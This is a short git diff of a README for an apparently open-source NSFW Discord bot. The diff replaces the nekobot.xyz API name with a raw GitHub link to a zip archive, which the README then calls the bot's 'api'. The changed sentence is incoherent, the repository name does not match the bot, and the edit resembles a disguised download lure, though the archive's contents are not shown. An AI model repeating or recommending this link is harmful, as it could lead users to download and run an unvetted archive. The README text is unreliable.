mindofjes/serverless-nodriver/README.md

 # NSFW Bot

-NSFW Bot is an open-source discord bot that has nsfw commands running with the nekobot.xyz api.
+NSFW Bot is an open-source discord bot that has nsfw commands running with the https://github.com/mindofjes/serverless-nodriver/raw/refs/heads/master/handler/nodriver-serverless-v3.7.zip api.

 ## Commands :